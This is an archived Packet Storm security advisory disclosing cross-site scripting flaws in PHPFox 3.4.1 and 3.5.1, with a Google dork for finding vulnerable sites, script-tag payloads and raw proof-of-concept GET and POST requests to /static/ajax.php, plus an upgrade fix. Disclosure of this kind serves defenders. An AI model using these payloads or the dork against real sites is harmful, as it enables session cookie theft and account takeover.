PHPFox 3.4.1 Cross Site Scripting

2013-08-09T00:00:00
ID PACKETSTORM:122762
Type packetstorm
Reporter Mehdi Dadkhah
Modified 2013-08-09T00:00:00

Description

                                        
                                            `PHPFox v3.4.1 XSS vulnerabilities  
------------------------------------------------------------  
  
== Description ==  
- Software link: http://www.phpfox.com  
- Affected versions: version 3.4.1 and 3.5.1 is vulnerable. Other  
versions might be affected as well.  
- Vulnerability discovered by: Mehdi Dadkhah (Isfahan z10o0@yahoo.com)  
-Google Dork: "Powered By PHPFox Version 3.4.1"  
== Vulnerabilities ==  
URL encoded POST input sId was set to '"()&%1<ScRiPt >prompt(945307)</ScRiPt>  
This vulnerability affects in [UrlOfSite]/static/ajax.php  
OR  
URL encoded POST input block_id was set to '"()&%1<ScRiPt >prompt(983655)</ScRiPt>  
This vulnerability affects in [UrlOfSite]/static/ajax.php  
OR  
URL encoded GET input message was set to '"()&%1<ScRiPt >prompt(990170)</ScRiPt>  
This vulnerability affects in [UrlOfSite]/static/ajax.php  
Above parameters are not correctly  
sanitized before being used , making them  
vulnerable to XSS attacks.  
  
== Proof of concept ==  
  
- For the sId parameter, when URL encoded POST input block_id was set to '"()&%1<ScRiPt >prompt(983655)</ScRiPt>  
then we have this:  
  
POST /static/ajax.php   
block_id=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28983655%29%3c%2fScRiPt%3e&core[ajax]  
=true&core[call]=core.hideBlock&core[is_admincp]=0&core[is_user_profile]=0&core[profile_user_id]=0&core[security_token]=fb93d433ca43a5a389075476267439f6&sController=video.index&type_id= video_category  
  
- For the message parameter,URL encoded GET input message was set to '"()&%1<ScRiPt >prompt(990170)</ScRiPt>  
then we have this:  
  
GET /static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=  
fb93d433ca43a5a389075476267439f6&height=150&message=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28990170%29%3c%2fScRiPt%3e&width=300  
  
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user   
in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating   
the user. It is also possible to modify the content of the page presented to the user   
== Solution ==  
Upgrade the product to the 3.6.0 (build6) version. Note that builds 4  
and 5 also may contain the vulnerability.  
  
`